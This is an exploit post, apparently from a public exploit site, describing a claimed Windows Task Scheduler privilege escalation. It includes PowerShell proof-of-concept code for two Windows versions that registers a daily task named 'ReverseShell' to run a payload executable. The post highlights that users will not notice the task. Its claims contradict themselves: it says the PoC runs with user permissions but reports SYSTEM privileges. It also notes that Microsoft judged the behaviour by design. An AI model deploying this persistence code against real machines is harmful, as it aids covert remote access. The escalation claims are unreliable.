Microsoft Windows Task Scheduler Privilege Escalation Vulnerability

# Exploit Title: Microsoft Windows Task Scheduler Privilege Escalation 
# Date: 10/7/19
# Exploit Author: Social Engineering Neo
# Version: Windows 7 SP1 → Windows 10 1903
# Tested on: 7 SP1, 10 1809 & 1903


#    Microsoft Windows Task Scheduler EoP Report by Social Engineering Neo.
#
#    Normal Users are able to Tirgger Programs at Intervals on any Account on the Host System/Domain without Propper Authorization.
#    Read our in depth report @ https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/taskschdEoP_Report.txt 

#Platform:
#
#    Windows 7 SP1, Windows 10 (1809 & 1903), All versions in between are likely to be affected.
#    Tested on the most recent security patch. (July 2019)


#Class:
#
#    Improper Authorization (CWE-285).
#    Remote Code Execution.

#Proof of Concept: -

#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger =  New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."


#CLI NOTE: - We have not put much time/effort into the script-based PoC, we encourage a skilled programmer to elaborate on this further;)
#        : - PoC will run task with "user" permissions.
#        : - You obviously need your own payload and configure accordingly.


#VIDEO: -    https://youtu.be/z2C-IykCfbk **updated**
#     : -    https://youtu.be/_leFNyo5wxM *original*



#Expected Result: -
#
#    Normal users should not be able to run tasks as other user and execute programs on accounts without proper authorization.


#Observed Result: -
#
#    Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromisation.



#NOTE: - We reported this issue to Microsoft.
#    : - According to Microsoft, this functionality is considered "By Design" & have no intent to service this issue.
#    : - Have a read @ https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
#    : - We (Social Engineering Neo) consider this as a PoC rather than an actual exploit.
#    : - Because the payload was being loaded through Task Scheduler, the user will have no knowlege the payload is being ran. (even if they checked)


#TIMELINE: - Discovery         5th July 2019
#        : - Initial Report    5th July 2019
#        : - Case Opened       8th July 2019
#        : - Added Detail      8th July 2019    *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
#        : - MSRC Response     9th July 2019
#        : - Our Response      9th July 2019
#        : - Case Closed       9th July 2019
#        : - MSRC Response     9th July 2019
#        : - Our Response      9th July 2019    *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)
#
#        : - We thank the MSRC team for their quick response.

#  0day.today [2019-12-04]  #